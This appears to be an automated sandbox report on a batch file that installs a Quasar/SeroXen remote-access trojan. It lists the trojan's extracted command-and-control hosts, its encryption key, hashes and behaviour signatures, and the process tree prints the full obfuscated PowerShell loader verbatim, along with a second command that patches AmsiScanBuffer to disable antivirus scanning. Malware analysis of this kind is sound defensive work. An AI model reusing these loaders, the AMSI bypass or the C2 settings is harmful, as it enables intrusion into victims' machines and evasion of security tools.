Analysis
-
max time kernel
135s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 10:17
Static task
static1
Behavioral task
behavioral1
Sample
hellotesting1.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
hellotesting1.bat
Resource
win10v2004-20240426-en
General
-
Target
hellotesting1.bat
-
Size
710KB
-
MD5
1c6a9ae804188b09a9d22a6ce2a4e16a
-
SHA1
fd6cb4acd356a4b21fdd3d8bad229153fefe6803
-
SHA256
2868c25ebff7a0b0ac9989e6df5a1d6f8625713980b1bf74af596d2204ed0d8c
-
SHA512
2fd8a3f0398d8b81d03529d74c532239e9da40a8565ab1e48d3278eca2b880def39d96d8e364f6bfa98b4326ac7ac9636fd0666c4ac051e74d47a40b17d9c576
-
SSDEEP
12288:0CA9ic1CGZWdhoXOExoF4LD4q+shjUIMgE4GScdQzNpxMtGh7CYS7lXInOZ1CTYz:0zTbkcxoi34qj5SgbGVG/xoK7CR3CTC
Malware Config
Extracted
quasar
3.1.5
SeroXen | v3.1.5 |
rights-varying.gl.at.ply.gg:55443
rights-varying.gl.at.ply.gg:3348
$Sxr-jy6vh8CtEJL5ceZuIb
-
encryption_key
MIQZkzdNR10rFBFJyNsU
-
install_name
$sxr-powershell.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
10
-
startup_key
Powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3408-25-0x0000000007980000-0x00000000079EC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4420 created 620 4420 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 15 3408 powershell.exe 17 3408 powershell.exe 19 3408 powershell.exe 32 3408 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Install.exepid process 4124 Install.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4420 set thread context of 1492 4420 powershell.EXE dllhost.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.EXEpid process 3408 powershell.exe 3408 powershell.exe 4420 powershell.EXE 4420 powershell.EXE 4420 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 3408 powershell.exe Token: SeDebugPrivilege 4420 powershell.EXE Token: SeDebugPrivilege 4420 powershell.EXE Token: SeDebugPrivilege 1492 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3408 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exepowershell.exepowershell.EXEdescription pid process target process PID 4532 wrote to memory of 3408 4532 cmd.exe powershell.exe PID 4532 wrote to memory of 3408 4532 cmd.exe powershell.exe PID 4532 wrote to memory of 3408 4532 cmd.exe powershell.exe PID 3408 wrote to memory of 4124 3408 powershell.exe Install.exe PID 3408 wrote to memory of 4124 3408 powershell.exe Install.exe PID 3408 wrote to memory of 4124 3408 powershell.exe Install.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe PID 4420 wrote to memory of 1492 4420 powershell.EXE dllhost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0eef8596-6946-4e1c-b5fc-e95152599b67}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IbqOzYTeDhh6EbAnT+hBFd1cVHa3aIZ61TH3e8TlXMw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TRyGVjGg7e04rN6VcrTNsA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rutUS=New-Object System.IO.MemoryStream(,$param_var); $RKQvm=New-Object System.IO.MemoryStream; $DRWff=New-Object System.IO.Compression.GZipStream($rutUS, [IO.Compression.CompressionMode]::Decompress); $DRWff.CopyTo($RKQvm); $DRWff.Dispose(); $rutUS.Dispose(); $RKQvm.Dispose(); $RKQvm.ToArray();}function execute_function($param_var,$param2_var){ $tCKKt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QCbWu=$tCKKt.EntryPoint; $QCbWu.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat';$YYuKO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat').Split([Environment]::NewLine);foreach ($LeEqs in $YYuKO) { if ($LeEqs.StartsWith(':: ')) { $XNFZh=$LeEqs.Substring(3); break; }}$payloads_var=[string[]]$XNFZh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
PID:4124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OQycNYRJvWog{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GZPvNMhkLeELhC,[Parameter(Position=1)][Type]$zmIsdghgHg)$vAHYeZWdHGz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+'c'+'t'+'e'+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+'yM'+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+'a'+'t'+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+','+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$vAHYeZWdHGz.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'p'+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$GZPvNMhkLeELhC).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');$vAHYeZWdHGz.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+'rt'+[Char](117)+''+[Char](97)+'l',$zmIsdghgHg,$GZPvNMhkLeELhC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Man'+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $vAHYeZWdHGz.CreateType();}$IgFVSsaoxpnNB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+'ft.'+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'eN'+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$KTiXpkXyHUtZlZ=$IgFVSsaoxpnNB.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+[Char](114)+'oc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+'ub'+'l'+'i'+'c'+''+','+''+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TreHhZrcXNviQxQOyGU=OQycNYRJvWog @([String])([IntPtr]);$LAxOlaTpFTEQVbAWjECwje=OQycNYRJvWog @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IxowoTVCAfl=$IgFVSsaoxpnNB.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+'e'+''+'l'+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HJHsmRUpxZntni=$KTiXpkXyHUtZlZ.Invoke($Null,@([Object]$IxowoTVCAfl,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+[Char](105)+'bra'+[Char](114)+''+[Char](121)+'A')));$twWyDRwVFPSUKBYLj=$KTiXpkXyHUtZlZ.Invoke($Null,@([Object]$IxowoTVCAfl,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+[Char](116)+'')));$RDLnAiG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HJHsmRUpxZntni,$TreHhZrcXNviQxQOyGU).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i'+'.'+''+'d'+''+'l'+''+'l'+'');$GaGdnvEyEXIZbizHZ=$KTiXpkXyHUtZlZ.Invoke($Null,@([Object]$RDLnAiG,[Object]('Am'+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+'uf'+'f'+''+[Char](101)+'r')));$phGsSQAFYj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($twWyDRwVFPSUKBYLj,$LAxOlaTpFTEQVbAWjECwje).Invoke($GaGdnvEyEXIZbizHZ,[uint32]8,4,[ref]$phGsSQAFYj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GaGdnvEyEXIZbizHZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($twWyDRwVFPSUKBYLj,$LAxOlaTpFTEQVbAWjECwje).Invoke($GaGdnvEyEXIZbizHZ,[uint32]8,0x20,[ref]$phGsSQAFYj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+'t'+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4420
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
163KB
MD5051b3f7c30caf2eedbed29daa6192efb
SHA1a3e0f31e4b4367e5af06f71e7718e7d64ceb250d
SHA2566cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3
SHA51293288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82